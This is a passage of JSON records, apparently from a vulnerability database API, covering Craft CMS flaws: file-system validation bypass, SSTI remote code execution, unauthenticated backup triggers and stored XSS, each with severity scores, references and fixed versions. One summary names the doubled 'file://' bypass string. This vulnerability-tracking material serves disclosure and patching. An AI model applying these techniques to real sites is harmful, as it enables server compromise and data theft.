requires no admin privileges, no special permissions beyond basic control panel access, and\nbypasses all production hardening settings (allowAdminChanges: false, devMode: false,\nenableTwigSandbox: true).\n\nUsers should update to the patched 5.99 release to mitigate the 
issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-31857","reference_id":"","reference_type":"","scores":[{"value":"0.00138","scoring_system":"epss","scoring_elements":"0.33515","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-31857"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/8d4903647dcfd31b8d40ed027e27082013347a80","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-03-12T14:02:18Z/"}],"url":"https://github.com/craftcms/cms/commit/8d4903647dcfd31b8d40ed027e27082013347a80"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31857","reference_id":"CVE-2026-31857","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-31857"},{"reference_url":"https://github.com/advisories/GHSA-fp5j-j7j4-mcxc","reference_id":"GHSA-fp5j-j7j4-mcxc","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-fp5j-j7j4-mcxc"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-fp5j-j7j4-mcxc","reference_id":"GHSA-fp5j
-j7j4-mcxc","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-03-12T14:02:18Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-fp5j-j7j4-mcxc"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74806?format=json","purl":"pkg:composer/craftcms/cms@5.9.9","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-6ban-jvfq-w3at"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.9.9"}],"aliases":["CVE-2026-31857","GHSA-fp5j-j7j4-mcxc"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-4wkr-jx1w-77hn"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/56185?format=json","vulnerability_id":"VCID-5cxe-tjpb-3qan","summary":"Local File System Validation Bypass Leading to File Overwrite, Sensitive File Access, and Potential Code Execution\nA vulnerability in CraftCMS 
allows an attacker to bypass local file system validation by utilizing a double `file://` scheme (e.g., `file://file:////`). This enables the attacker to specify sensitive folders as the file system, leading to potential file overwriting through malicious uploads, unauthorized access to sensitive files, and, under certain conditions, remote code execution (RCE) via Server-Side Template Injection (SSTI) payloads.\n\nNote that this will only work if you have an authenticated administrator account with allowAdminChanges enabled","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-52291","reference_id":"","reference_type":"","scores":[{"value":"0.00128","scoring_system":"epss","scoring_elements":"0.31722","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-52291"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"8.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H"},{"value":"7.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-52291","reference_id":"CVE-2024-52291","reference_type":"","scores":[{"value":"8.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H"},{"value":"7.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-52291"},{"reference_url":"https://github.com/advisories/GHSA-jrh5-vhr9-qh7q","reference_id":"GHSA-jrh5-vhr9-qh7q","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-jrh5-vhr9-qh7q"},{"r
eference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-jrh5-vhr9-qh7q","reference_id":"GHSA-jrh5-vhr9-qh7q","reference_type":"","scores":[{"value":"8.4","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H"},{"value":"8.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H"},{"value":"7.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-11-13T18:50:50Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-jrh5-vhr9-qh7q"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/83249?format=json","purl":"pkg:composer/craftcms/cms@5.4.6","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1468-4fdx-kbfr"},{"vulnerability":"VCID-1mb5-28xp-ckd2"},{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5mnd-qvaq-k3am"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-7y4f-ef7t-47eb"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-9enr-b6zd-mbh8"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-c2nk-y4rx-1qf4"},{"vulnerability":"VCID-chep-xthg-zuee"},{"vulnerability":"VCID-cys8-jnmu-77ec"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-esma-wxje-eqh3"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5
-ukhu"},{"vulnerability":"VCID-h6t5-pdp5-8qhe"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jeyh-3jxd-z3g6"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jsfs-azcs-mfcm"},{"vulnerability":"VCID-jxet-d8ux-mkge"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-ppet-ruae-1kav"},{"vulnerability":"VCID-qq68-3j4y-47am"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-r5hp-5nju-9ubz"},{"vulnerability":"VCID-rb7c-3nkc-gkeg"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-twuy-wzb7-k7g3"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-vvhc-rnpr-ubey"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.4.6"}],"aliases":["CVE-2024-52291","GHSA-jrh5-vhr9-qh7q"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-5cxe-tjpb-3qan"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/49586?format=json","vulnerability_id":"VCID-5mnd-qvaq-k3am","summary":"Unauthenticated Craft CMS users can trigger a database backup\nUnauthenticated users can trigger database backup operations via specific admin actions, potentially leading to resource exhaustion or information disclosure. Users should update to the patched versions (5.8.21 and 4.16.17) to mitigate the issue. Craft 3 users should update to the latest Craft 4 and 5 releases, which include the 
fixes.\n\nResources:\n\nhttps://github.com/craftcms/cms/commit/f83d4e0c6b906743206b4747db4abf8164b8da39\n\nhttps://github.com/craftcms/cms/blob/5.x/CHANGELOG.md","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-68456","reference_id":"","reference_type":"","scores":[{"value":"0.00214","scoring_system":"epss","scoring_elements":"0.4399","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-68456"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5821---2025-12-04","reference_id":"","reference_type":"","scores":[{"value":"7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-06T14:26:08Z/"}],"url":"https://github.com/craftcms/cms/blob/5.x/CHANGELOG.md#5821---2025-12-04"},{"reference_url":"https://github.com/craftcms/cms/commit/f83d4e0c6b906743206b4747db4abf8164b8da39","reference_id":"","reference_type":"","scores":[{"value":"7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_syste
m":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-06T14:26:08Z/"}],"url":"https://github.com/craftcms/cms/commit/f83d4e0c6b906743206b4747db4abf8164b8da39"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-68456","reference_id":"CVE-2025-68456","reference_type":"","scores":[{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-68456"},{"reference_url":"https://github.com/advisories/GHSA-v64r-7wg9-23pr","reference_id":"GHSA-v64r-7wg9-23pr","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-v64r-7wg9-23pr"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-v64r-7wg9-23pr","reference_id":"GHSA-v64r-7wg9-23pr","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"7.0","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-01-06T14:26:08Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-v64r-7wg9-23pr"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/73169?format=json","purl":"pkg:composer/craftcms/cms@5.8.21","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerabili
ty":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-9enr-b6zd-mbh8"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-cys8-jnmu-77ec"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-esma-wxje-eqh3"},{"vulnerability":"VCID-fpea-e48p-kfbn"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hkp9-3hzv-quhk"},{"vulnerability":"VCID-hyct-5gap-7kdu"},{"vulnerability":"VCID-jeyh-3jxd-z3g6"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-ppet-ruae-1kav"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-twuy-wzb7-k7g3"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-vvhc-rnpr-ubey"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.8.21"}],"aliases":["CVE-2025-68456","GHSA-v64r-7wg9-23pr"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-5mnd-qvaq-k3am"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/50362?format=json","vulnerability_id":"VCID-5q5g-jrxm-eyhe","summary":"Craft CMS has Stored XSS in Table Field in its \"Row 
Heading\" Column Type\nA stored Cross-site Scripting (XSS) vulnerability exists in the `editableTable.twig` component when using the `Row Heading` column type. The application fails to sanitize input within row headings, allowing an attacker to execute arbitrary JavaScript when another user views a page with the malicious table field.","references":[{"reference_url":"https://craftcms.com/knowledge-base/securing-craft#set-allowAdminChanges-to-false-in-production","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://craftcms.com/knowledge-base/securing-craft#set-allowAdminChanges-to-false-in-production"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/7b372de262b8d9d2ce859f32780c3715719b6f5a","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/commit/7b372de262b8d9d2ce859f32780c3715719b6f5a"},{"reference_url":"https://github.com/craftcms/cms/releases/tag/4.16.19","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/releases/tag/4.16.19"},{"reference_url":"
https://github.com/craftcms/cms/releases/tag/5.8.23","reference_id":"","reference_type":"","scores":[{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/releases/tag/5.8.23"},{"reference_url":"https://github.com/advisories/GHSA-6j87-m5qx-9fqp","reference_id":"GHSA-6j87-m5qx-9fqp","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-6j87-m5qx-9fqp"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-6j87-m5qx-9fqp","reference_id":"GHSA-6j87-m5qx-9fqp","reference_type":"","scores":[{"value":"LOW","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"2.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-6j87-m5qx-9fqp"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/74188?format=json","purl":"pkg:composer/craftcms/cms@5.8.23","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5tzm-738x-xka9"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-a8p2-5cmc-n7g2"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-bqep-3c6u-mqhu"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-fpke-p7sz-nfc9"},{"vulnerability":"VCID-gzry-xtu5-ukhu"},{"vulnerability":"VCID-hyct-5gap-7kdu
"},{"vulnerability":"VCID-jnrx-e9b5-wqew"},{"vulnerability":"VCID-jxz8-g6fq-dubw"},{"vulnerability":"VCID-kbrc-85av-nfcn"},{"vulnerability":"VCID-m5rf-usae-yfb7"},{"vulnerability":"VCID-nmzu-mefv-tqeh"},{"vulnerability":"VCID-p3n8-1sht-bfbt"},{"vulnerability":"VCID-pgm4-svq8-tfc5"},{"vulnerability":"VCID-qwmy-d2e8-5khw"},{"vulnerability":"VCID-qywv-vf4r-8bh9"},{"vulnerability":"VCID-rzq4-h1ms-nqef"},{"vulnerability":"VCID-sa99-8awj-eycd"},{"vulnerability":"VCID-tzjk-x116-ayge"},{"vulnerability":"VCID-vasz-rnn1-67ev"},{"vulnerability":"VCID-w9yn-1573-hyau"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/craftcms/cms@5.8.23"}],"aliases":["GHSA-6j87-m5qx-9fqp"],"risk_score":1.4,"exploitability":"0.5","weighted_severity":"2.7","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-5q5g-jrxm-eyhe"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/56181?format=json","vulnerability_id":"VCID-71sv-62m4-z3er","summary":"Craft CMS vulnerable to Potential Remote Code Execution via missing path normalization & Twig SSTI\nMissing `normalizePath` in the function `FileHelper::absolutePath` could lead to Remote Code Execution on the server via twig SSTI.\n\n`(Post-authentication, 
ALLOW_ADMIN_CHANGES=true)`","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-52293","reference_id":"","reference_type":"","scores":[{"value":"0.21994","scoring_system":"epss","scoring_elements":"0.95885","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-52293"},{"reference_url":"https://github.com/craftcms/cms","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/craftcms/cms"},{"reference_url":"https://github.com/craftcms/cms/commit/123e48a696de1e2f63ab519d4730eb3b87beaa58","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-11-13T18:54:41Z/"}],"url":"https://github.com/craftcms/cms/commit/123e48a696de1e2f63ab519d4730eb3b87beaa58"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-52293","reference_id":"CVE-2024-52293","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-52293"},{"reference_url":"https://githu
b.com/advisories/GHSA-f3cw-hg6r-chfv","reference_id":"GHSA-f3cw-hg6r-chfv","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-f3cw-hg6r-chfv"},{"reference_url":"https://github.com/craftcms/cms/security/advisories/GHSA-f3cw-hg6r-chfv","reference_id":"GHSA-f3cw-hg6r-chfv","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-11-13T18:54:41Z/"}],"url":"https://github.com/craftcms/cms/security/advisories/GHSA-f3cw-hg6r-chfv"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/83245?format=json","purl":"pkg:composer/craftcms/cms@5.4.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1468-4fdx-kbfr"},{"vulnerability":"VCID-1mb5-28xp-ckd2"},{"vulnerability":"VCID-39ct-cg7w-kyb6"},{"vulnerability":"VCID-41uv-1axm-fugb"},{"vulnerability":"VCID-4wkr-jx1w-77hn"},{"vulnerability":"VCID-5cxe-tjpb-3qan"},{"vulnerability":"VCID-5mnd-qvaq-k3am"},{"vulnerability":"VCID-5q5g-jrxm-eyhe"},{"vulnerability":"VCID-7y4f-ef7t-47eb"},{"vulnerability":"VCID-83rt-3tyj-qbgx"},{"vulnerability":"VCID-8u2j-17a4-q7eh"},{"vulnerability":"VCID-9ca4-tbhq-27ad"},{"vulnerability":"VCID-9enr-b6zd-mbh8"},{"vulnerability":"VCID-a3b5-pwyh-yugv"},{"vulnerability":"VCID-akrv-yqnf-1kg8"},{"vulnerability":"VCID-asek-4gme-gug8"},{"vulnerability":"VCID-azr5-12f8-hfbm"},{"vulnerability":"VCID-c2nk-y4rx-1qf4"},{"vulnerability":"VCID-chep-xthg-zuee"},{"vulnerability":"VCID-cys8-jnmu-77ec"},{"vulnerability":"VCID-e94m-mj1k-8kbr"},{"vulnerability":"VCID-eaxm-rjr7-xudb"},{"vulnerability":"VCID-efwv-r3nc-73h9"},{"vulnerability":"VCID-esma-wxje-eqh3"},{"vulnerabili
